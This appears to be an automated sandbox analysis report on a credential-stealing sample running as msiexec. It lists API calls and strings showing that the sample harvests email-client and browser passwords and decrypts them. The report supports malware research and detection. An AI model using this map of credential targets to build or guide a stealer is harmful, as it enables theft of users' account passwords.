                                                                                              • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                              • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                              • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 445 404734-40474a call 404785 LoadLibraryA 448 40474c-404762 GetProcAddress 445->448 449 40476e-404778 445->449 448->449 450 404764 448->450 451 404781-404784 449->451 452 40477a-40477c call 404785 449->452 450->449 452->451
                                                                                              APIs
                                                                                                • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                              • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID:
                                                                                              • API String ID: 145871493-0
                                                                                              • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                              • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                              • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                              • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                              APIs
                                                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                              • String ID:
                                                                                              • API String ID: 4165544737-0
                                                                                              • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                              • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                              • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                              • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                              • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                              • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                              • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                              APIs
                                                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                              • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                              • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                              • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                              • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                              • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                              • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                              APIs
                                                                                              • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                              • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                              • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                              • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                              • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                              • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                              • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                              • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                              • API String ID: 2238633743-192783356
                                                                                              • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                              • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                              • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                              • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                              APIs
                                                                                              • EmptyClipboard.USER32 ref: 00406E06
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                              • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                              • GetLastError.KERNEL32 ref: 00406E74
                                                                                              • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                              • GetLastError.KERNEL32 ref: 00406E8B
                                                                                              • CloseClipboard.USER32 ref: 00406E94
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClipboardGlobal$CloseErrorFileLast$AllocDataEmptyHandleLockReadSizeUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 2624330674-0
                                                                                              • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                              • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                                                              • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                              • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                              • API String ID: 3963849919-1658304561
                                                                                              • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                              • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                              • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                              • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                              • String ID: (yE$(yE$(yE
                                                                                              • API String ID: 1865533344-362086290
                                                                                              • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                              • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                              • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                              • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                              APIs
                                                                                              • strlen.MSVCRT ref: 004431AD
                                                                                              • strncmp.MSVCRT ref: 004431BD
                                                                                              • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                              • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                              • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                              • API String ID: 1895597112-3210201812
                                                                                              • Opcode ID: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                              • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                              • Opcode Fuzzy Hash: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                              • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                              • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                              • API String ID: 1714764973-479759155
                                                                                              • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                              • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                              • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                              • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040EBD8
                                                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                              • memset.MSVCRT ref: 0040EC2B
                                                                                              • memset.MSVCRT ref: 0040EC47
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                              • memset.MSVCRT ref: 0040ECDD
                                                                                              • memset.MSVCRT ref: 0040ECF2
                                                                                              • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                              • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                              • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                              • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                              • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                              • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                              • memset.MSVCRT ref: 0040EDE1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                              • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                              • API String ID: 3137614212-1455797042
                                                                                              • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                              • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                              • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                              • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                              • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                              • API String ID: 2814039832-2206097438
                                                                                              • Opcode ID: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                              • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                              • Opcode Fuzzy Hash: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                              • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                              APIs
                                                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                              • memset.MSVCRT ref: 0040E5B8
                                                                                              • memset.MSVCRT ref: 0040E5CD
                                                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                              • memset.MSVCRT ref: 0040E6B5
                                                                                              • memset.MSVCRT ref: 0040E6CC
                                                                                                • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                              • memset.MSVCRT ref: 0040E736
                                                                                              • memset.MSVCRT ref: 0040E74F
                                                                                              • sprintf.MSVCRT ref: 0040E76D
                                                                                              • sprintf.MSVCRT ref: 0040E788
                                                                                              • _strcmpi.MSVCRT ref: 0040E79E
                                                                                              • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                              • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                              • memset.MSVCRT ref: 0040E858
                                                                                              • sprintf.MSVCRT ref: 0040E873
                                                                                              • _strcmpi.MSVCRT ref: 0040E889
                                                                                              • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                              • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                              • API String ID: 4171719235-3943159138
                                                                                              • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                              • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                              • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                              • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                              • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                              • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                              • GetDC.USER32 ref: 004104E2
                                                                                              • strlen.MSVCRT ref: 00410522
                                                                                              • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                              • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                              • sprintf.MSVCRT ref: 00410640
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                              • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                              • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                              • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                              • GetClientRect.USER32(?,?), ref: 00410737
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                              • API String ID: 1703216249-3046471546
                                                                                              • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                              • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                              • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                              • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004024F5
                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                              • _mbscpy.MSVCRT(?,00000000,?,?,?,6CBC7B60,?,00000000), ref: 00402533
                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$QueryValuememset
                                                                                              • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                              • API String ID: 168965057-606283353
                                                                                              • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                              • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
